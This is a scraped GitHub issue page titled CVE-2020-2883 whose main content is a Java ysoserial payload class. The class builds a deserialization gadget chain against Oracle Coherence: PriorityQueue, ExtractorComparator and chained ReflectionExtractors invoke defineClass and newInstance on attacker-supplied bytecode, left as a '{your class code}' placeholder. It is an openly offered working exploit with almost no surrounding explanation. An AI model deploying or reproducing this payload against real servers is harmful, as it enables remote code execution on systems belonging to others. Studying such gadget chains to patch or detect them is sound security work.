We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2020-2883
package ysoserial.payloads; import java.lang.reflect.Field; import java.util.PriorityQueue; import com.tangosol.util.ValueExtractor; import com.tangosol.util.comparator.ExtractorComparator; import com.tangosol.util.extractor.ChainedExtractor; import com.tangosol.util.extractor.ReflectionExtractor; import ysoserial.payloads.annotation.Authors; import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.annotation.PayloadTest; import ysoserial.payloads.util.PayloadRunner; /* * https://github.com/hktalent/CVE_2020_2546/ * */ @SuppressWarnings({ "rawtypes", "unchecked" }) @PayloadTest(precondition = "isApplicableJavaVersion") @Dependencies() @Authors({ Authors.MTX }) public class CVE_2020_2883 implements ObjectPayload<PriorityQueue> { public PriorityQueue getObject(String command) throws Exception { // // DefiningClassLoader() ReflectionExtractor extractor1 = new ReflectionExtractor( "newInstance",//getMethod new Object[0] ); // invoke("exec","calc") ReflectionExtractor extractor3 = new ReflectionExtractor( "defineClass", new Object[]{new String(new byte[]{121,115,111,115,101,114,105,97,108,46,95,53,49,112,119,110,95,99,111,109,46,85,112,88,51,52,100,101,102,105,110,101,67,108,97,115,115}), new byte[] {your class code},null,null} ); // get invoke() to execute exec() ReflectionExtractor extractor5 = new ReflectionExtractor( "newInstance", new Object[]{} ); ValueExtractor[] valueExtractors = { extractor1, extractor3, extractor5, }; Class clazz = ChainedExtractor.class.getSuperclass(); Field m_aExtractor = clazz.getDeclaredField("m_aExtractor"); m_aExtractor.setAccessible(true); ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{}); ValueExtractor[] valueExtractors1 = new ValueExtractor[]{ reflectionExtractor }; ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1); PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1)); queue.add("1"); queue.add("1"); m_aExtractor.set(chainedExtractor1, valueExtractors); Object[] queueArray = (Object[]) ysoserial.payloads.util.Reflections.getFieldValue(queue, "queue"); queueArray[0] = sun.misc.Unsafe.class; queueArray[1] = "1"; return queue; } public static void main(String[] args) throws Exception { PayloadRunner.run(CVE_2020_2883.class, args); } }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
CVE-2020-2883
The text was updated successfully, but these errors were encountered: